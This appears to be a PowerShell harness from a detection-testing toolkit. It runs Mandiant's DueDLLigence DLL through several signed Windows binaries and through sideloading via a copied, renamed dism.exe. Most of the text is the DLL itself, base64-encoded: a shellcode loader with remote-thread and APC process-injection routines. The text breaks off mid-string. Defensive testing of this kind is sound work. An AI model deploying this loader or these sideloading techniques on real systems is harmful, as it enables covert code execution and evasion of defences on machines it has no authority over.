function Invoke-SPLDLLigence {

    <#
  
    .NOTES
  
    Author  : @m_haggis
    Version : 1.0
    Purpose : PowerShell harness for DueDLLigence DLL testing
  
   .DESCRIPTION
  
      The following harness utilizes the base DueDLLigence DLL to simulate 5 of 7 built in behaviors. 
   
   .EXAMPLE
  
      Invoke-SPLDLLigence -method control
      Executes control.exe method loading .cpl file
   
   .EXAMPLE
  
      Invoke-SPLDLLigence -method dism_side_load
      Copies dism.exe to new location and renames DueDLLigence.dll as dismcore.dll. Spawns dism.exe which sideloads the malicious DLL.
  
  
   .LINK
  
       https://www.virustotal.com/gui/file/71227bc1534a092ba03e6374cad929b193d1f6667cb781efd059b7d7d8e09c1d/detection
       https://github.com/mandiant/DueDLLigence
    #>
   
      param (
      [Parameter(Mandatory)]
      [String]
      [ValidateSet('rasautou','control','rundll32','msiexec','dism_side_load')]
      $method,
          
      [Parameter()]
      [String]
      $DueDLLigencePath = 'C:\temp\duedlligence.dll',
  
      [Parameter()]
      [String]
      $DueDLLigenceCPLPath = "C:\temp\duedlligence.cpl"
  
      )
   
  
      # Convert DLL to base64
      #
      #$file = "C:\temp\duedlligence.dll"
      #$filebytes = Get-Content $file -Encoding byte
      #$fileBytesBase64 = [System.Convert]::ToBase64String($filebytes)
      #$fileBytesBase64 | Out-File 'c:\users\administrator\desktop\duedll.txt'
  
      # Encoded Sample: https://www.virustotal.com/gui/file/71227bc1534a092ba03e6374cad929b193d1f6667cb781efd059b7d7d8e09c1d
      $EncodedDueDLLigence  = "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bWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAENvbVZpc2libGVBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAFN5c3RlbQBPYmplY3QARW51bQBWYWx1ZVR5cGUAQ2FsbENvbnZTdGRjYWxsAENhbGxDb252Q2RlY2wASW50UHRyAFplcm8AQnl0ZQBSdW50aW1lSGVscGVycwBBcnJheQBSdW50aW1lRmllbGRIYW5kbGUASW5pdGlhbGl6ZUFycmF5AGdldF9TaXplAG9wX0VxdWFsaXR5AE1hcnNoYWwAQ29weQBvcF9FeHBsaWNpdABTdHJpbmcARW1wdHkAU3lzdGVtLkRpYWdub3N0aWNzAFByb2Nlc3NUaHJlYWRDb2xsZWN0aW9uAFByb2Nlc3MAR2V0UHJvY2Vzc0J5SWQAZ2V0X1RocmVhZHMAUHJvY2Vzc1RocmVhZABnZXRfSXRlbQBnZXRfSWQAU3lzdGVtLlRocmVhZGluZwBNb25pdG9yAEVudGVyAEV4aXQARW52aXJvbm1lbnQAR2V0RW52aXJvbm1lbnRWYXJpYWJsZQBJc051bGxPckVtcHR5AENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAER1ZURMTGlnZW5jZS5kbGwAa2VybmVsMzIuZGxsAG1zY29ybGliAER1ZURMTGlnZW5jZQBFeGVjdXRpb25NZXRob2QARnJlZVR5cGUAUHJvY2Vzc0NyZWF0aW9uRmxhZ3MAVGhyZWFkQWNjZXNzAFBST0NFU1NfSU5GT1JNQVRJT04AU1RBUlRVUElORk8APFByaXZhdGVJbXBsZW1lbnRhdGlvbkRldGFpbHM+AF9fU3RhdGljQXJyYXlJbml0VHlwZVNpemU9Mjc2AG1ldGhvZABEZWZhdWx0UHJvY1BhdGgAU3lzV09XNjRQcm9jUGF0aABTaGVsbGNvZGUzMgBTaGVsbGNvZGU2NABQYXlsb2FkTG9jawBQYXlsb2FkSGFzUnVuAE1FTV9DT01NSVQAUEFHRV9FWEVDVVRFX1JFQUQAUEFHRV9SRUFEV1JJVEUARGxsR2V0Q2xhc3NPYmplY3QASW5pdENyYXNoSGFuZGxlcgBTZW5kUmVwb3J0AElzUmVhZHlUb0V4aXQAU2V0Q3VzdG9tSW5mbwBBZGRVc2VySW5mb1RvUmVwb3J0AFJlbW92ZVVzZXJJbmZvRnJvbVJlcG9ydABBZGRGaWxlVG9SZXBvcnQAUmVtb3ZlRmlsZUZyb21SZXBvcnQAR2V0VmVyc2lvbkZyb21BcHAAR2V0VmVyc2lvbkZyb21GaWxlAFByZXByb2Nlc3NDbWRMaW5lRXhXAFVuaW5pdFBvdFBsYXllcgBDcmVhdGVQb3RQbGF5ZXJFeFcARGVzdHJveVBvdFBsYXllcgBTZXRQb3RQbGF5UmVnS2V5VwBSdW5Qb3RQbGF5ZXIAQ1BsQXBwbGV0AFBvd2Vyc2hlbGwARGxsVW5SZWdpc3RlclNlcnZlcgBSdW5TaGVsbGNvZGUARXhlY0NyZWF0ZVRocmVhZABFeGVjQ3JlYXRlUmVtb3RlVGhyZWFkAEV4ZWNRdWV1ZVVzZXJBUEMAU2FmZXR5SGFuZGxlcgBDbGVhbgBoUHJvY2VzcwBhZGRyZXNzAGxlbmd0aABTdGFydFByb2Nlc3MAcHJvY2VzcwBPc0lzMzIAQ3JlYXRlUHJvY2VzcwBscEFwcGxpY2F0aW9uTmFtZQBscENvbW1hbmRMaW5lAGxwUHJvY2Vzc0F0dHJpYnV0ZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAGJJbmhlcml0SGFuZGxlcwBkd0NyZWF0aW9uRmxhZ3MAbHBFbnZpcm9ubWVudABscEN1cnJlbnREaXJlY3RvcnkAbHBTdGFydHVwSW5mbwBscFByb2Nlc3NJbmZvcm1hdGlvbgBUZXJtaW5hdGVQcm9jZXNzAHVFeGl0Q29kZQBDcmVhdGVSZW1vdGVUaHJlYWQAZHdTdGFja1NpemUAbHBTdGFydEFkZHJlc3MAbHBQYXJhbWV0ZXIAbHBUaHJlYWRJZABDcmVhdGVUaHJlYWQAcGFyYW0AT3BlblByb2Nlc3MAZHdEZXNpcmVkQWNjZXNzAGJJbmhlcml0SGFuZGxlAGR3UHJvY2Vzc0lkAE9wZW5UaHJlYWQAZHdUaHJlYWRJZABRdWV1ZVVzZXJBUEMAcGZuQVBDAGhUaHJlYWQAZHdEYXRhAFJlc3VtZVRocmVhZABWaXJ0dWFsQWxsb2MAbHBTdGFydEFkZHIAc2l6ZQBmbEFsbG9jYXRpb25UeXBlAGZsUHJvdGVjdABWaXJ0dWFsQWxsb2NFeABscEFkZHJlc3MAZHdTaXplAFZpcnR1YWxGcmVlAGR3RnJlZVR5cGUAVmlydHVhbEZyZWVFeABWaXJ0dWFsUHJvdGVjdABmbE5ld1Byb3RlY3QAbHBmbE9sZFByb3RlY3QAVmlydHVhbFByb3RlY3RFeABXYWl0Rm9yU2luZ2xlT2JqZWN0AGhIYW5kbGUAZHdNaWxsaXNlY29uZHMAV3JpdGVQcm9jZXNzTWVtb3J5AGxwQmFzZUFkZHJlc3MAbHBCdWZmZXIAblNpemUAbHBOdW1iZXJPZkJ5dGVzV3JpdHRlbgAuY2N0b3IAdmFsdWVfXwBEZWNvbW1pdABSZWxlYXNlAENSRUFURV9OT19XSU5ET1cAQ1JFQVRFX1NVU1BFTkRFRABTRVRfQ09OVEVYVABjYgBscFJlc2VydmVkAGxwRGVza3RvcABscFRpdGxlAGR3WABkd1kAZHdYU2l6ZQBkd1lTaXplAGR3WENvdW50Q2hhcnMAZHdZQ291bnRDaGFycwBkd0ZpbGxBdHRyaWJ1dGUAZHdGbGFncwB3U2hvd1dpbmRvdwBjYlJlc2VydmVkMgBscFJlc2VydmVkMgBoU3RkSW5wdXQAaFN0ZE91dHB1dABoU3RkRXJyb3IANzA0ODhDNjJFN0Y1NkJBREJERTc2RkI1QTVENjlGQTZEN0MxRDQyNDNGNEEyNTYxMDZBN0RFMkU1QjQyNTNDQQAAI1AAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACgAeAA4ADYAKQAAP0MAOgBcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAzADIAXABuAG8AdABlAHAAYQBkAC4AZQB4AGUAAD9DADoAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAVwBPAFcANgA0AFwAbgBvAHQAZQBwAGEAZAAuAGUAeABlAACEwVIARQBKAEQATQAwAFEANQBOAHoAUQB5AE4ARQBZADAAUQBrAFYARgBPAEQAVgBCAE0AagBjAHgATQB6AFYARwBNAHoARgBEAE8AVQBJAHgATQB6AE0AegBNAFQAYwAzAE0AVABjADQATQAwAE0AMwBNAEQAUQB3AE0AegBsAEcATgBEAGwARABOAFUAVQAyAFEAVABNADQATgBqAGcAdwBNAEQAawAxAFEAagBVADMAUgBqAE0ANABNAEUASgBGAE4AagBZAHkATQBVAFkAMgBRADAASgBFAFEAawBZADEATgAwAE0ANQBPAFUAUQAzAE4AMABWAEUATQBEAEEANQBOAGoATgBHAE0AawBaAEUATQAwAFYARABOAEUASQA1AFIARQBJADMATQBVAFEAMQBNAEUAWgBGAE4ARQBSAEUATQBUAFUAeABNAFQAawA0AE0AVQBZADAAUQBVAFkAeABRAFQARgBFAE0ARABsAEcAUgBqAEIARgBOAGoAQgBEAE4AawBaAEIATQBFAEoARwBOAFUASgBEAE0AagBVADEAUQAwAEkAeABPAFUAUgBHAE4AVABRAHgAUQBqAEUAMgBOAFUAWQB5AFIAagBGAEYAUgBUAGcAeABOAEQAZwAxAE0AagBFAHoATwBEAGcAMABPAFQASQAyAFEAVQBFAHcAUQBVAFYARwBSAEQAUgBCAFIARABFADIATQB6AEYARgBRAGoAWQA1AE8ARABBADQAUgBEAFUAMABRAHoARgBDAFIARABrAHkATgAwAEYARABNAGsARQB5AE4AVQBWAEMATwBUAE0ANABNADAARQA0AFIAagBWAEUATgBEAEkAegBOAFQATQA0AE0ARABKAEYATgBUAEIARgBSAFQAawB6AFIAagBRAHkAUQBqAE0AMABNAFQARgBGAE8AVABoAEMAUQBrAFkANABNAFUATQA1AE0AawBFAHgATQB6AFUAMwBPAFQAawB5AE0ARQBRADQATQBUAE4ARABOAFQASQAwAFIARQBaAEcATQBEAGQARQBOAFQAQQAxAE4ARQBZADMATgBUAEYARQBNAFQASgBGAFIARQBNADMATgBVAEoAQgBSAGoAVQAzAFIARABKAEcATgBqAFkAMQBRAGoAZwB4AE0AawBaAEQAUgBUAEEAMABNAGoAYwB6AFEAawBaAEQATgBUAEUAMQBNAFQAWQAyAE4AawBGAEIATgAwAFEAegBNAFUATgBFAE0AMABF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